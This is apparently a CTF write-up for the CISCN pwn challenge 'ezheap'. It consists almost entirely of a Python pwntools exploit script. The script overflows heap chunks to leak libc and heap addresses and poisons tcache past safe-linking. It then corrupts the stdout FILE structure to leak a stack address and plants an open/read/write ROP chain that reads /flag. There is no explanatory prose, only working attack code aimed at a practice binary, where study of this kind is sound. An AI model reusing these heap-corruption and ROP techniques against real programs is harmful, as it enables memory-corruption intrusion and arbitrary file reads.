CISCN-PWN复现

ezheap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
# --------------------------exploit--------------------------
def exploit():
    li('exploit...')
    # add(0xf0,"A"*0x20)  #0
    # add(0xf0,"A"*0x20)  #1
    # add(0xf0,"A"*0x20)  #2
    # add(0xf0,"A"*0x20)  #3
    # delte(2)
    # delte(1)
    # edit(0,0x150,"B"*(0x100-1))
    # show(0)

    # main_base = u64(io.recvuntil("Wel", drop=True)[-6:].ljust(8, b"\x00"))-0x4B1945A3C
    # li("main_base ---------------> 0x%x"%main_base)
    add(0x200,"A"*0x20)  #0
    add(0x500,"A"*0x20)  #1
    add(0x200,"A"*0x20)  #2
    add(0x200,"A"*0x20)  #3
    add(0x200,"A"*0x20)  #4
    add(0x200,"A"*0x20)  #5
    delte(1)   #1
    edit(0,0x300,"B"*(0x210))
    show(0)
    libc_base = uu64()-0x21ACE0
    mprotect_addr = libc.sym['mprotect']+libc_base
    open_addr = libc_base+libc.sym['open']
    read_addr = libc_base+libc.sym['read']
    puts_addr = libc_base+libc.sym['puts']
    free_hook = libc_base +libc.sym['__free_hook']
    setcontext = libc_base + libc.sym['setcontext'] + 61
    IO_2_1_stdout = libc_base+libc.symbols['_IO_2_1_stdout_']

    li("libc_base ------------------> 0x%x"%libc_base)
    edit(0,0x300,b"A"*(0x208)+p64(0x511))
    add(0x500,"BBB") #1



    delte(5)
    edit(4,0x300,"C"*(0x210))
    show(4)
    ru(b"C"*(0x210))
    heap_base = (u64(io.recv(5).ljust(8,b'\x00')) << 12)-0x3000
    li("heap_base ------------------> 0x%x"%heap_base)
    edit(4,0x300,b"A"*(0x208)+p64(0x211))
    add(0x200,b"A"*0x20)  #5



    add(0x50,"D"*0x20) #6

    edit(6,0x500,b'a'*0x50+p64(0)+p64(0x31)+p64((IO_2_1_stdout-0x20) ^ ((heap_base) >> 12)))
    target_addr = libc_base+libc.symbols['_environ']


    add(0x20,"a")#7
    add(0x20,"a")#8


    payload = p64(0)*3+p64(libc_base+0x217600)+p64(0xfbad1800)+p64(libc_base+0x21b803)*3+p64(target_addr)+p64(target_addr+8)
    edit(8,0x500,payload)
    stack_addr = uu64()
    li("stack_addr = "+hex(stack_addr))

    db()
    delte(0) #0
    delte(4) #4 
    payload = b'a'*0x200+p64(0)+p64(0x211)+p64((stack_addr - 0x178) ^ ((heap_base+0x2000) >> 12))
    edit(3,0x500,payload)
    add(0x200,"a")  #0



    pop_rdi_ret = libc_base+0x000000000002a3e5
    pop_rsi_ret = 0x000000000002be51+libc_base
    
    pop_rdx_ret = 0x0000000000170337+libc_base
    pop_rax_ret = 0x0000000000045eb0+libc_base
    syscall_ret = libc_base+0x0000000000091316
    flag_addr = stack_addr - 0x178

    payload = b'/flag\x00'.ljust(8,b'\x00')+p64(pop_rdi_ret)+p64(flag_addr)+p64(pop_rsi_ret)+p64(0)+p64(pop_rax_ret)+p64(2)+p64(syscall_ret)
    payload += p64(pop_rdi_ret)+p64(3)+p64(pop_rsi_ret)+p64(stack_addr+0x300)+p64(pop_rdx_ret)+p64(0x50)+p64(pop_rax_ret)+b'a'*6+p64(0)+p64(syscall_ret)
    payload += p64(pop_rdi_ret)+p64(1)+p64(pop_rsi_ret)+p64(stack_addr+0x300)+p64(pop_rdx_ret)+p64(0x50)+p64(pop_rax_ret)+b'a'*6+p64(1)+p64(syscall_ret)


    add(0x200,payload)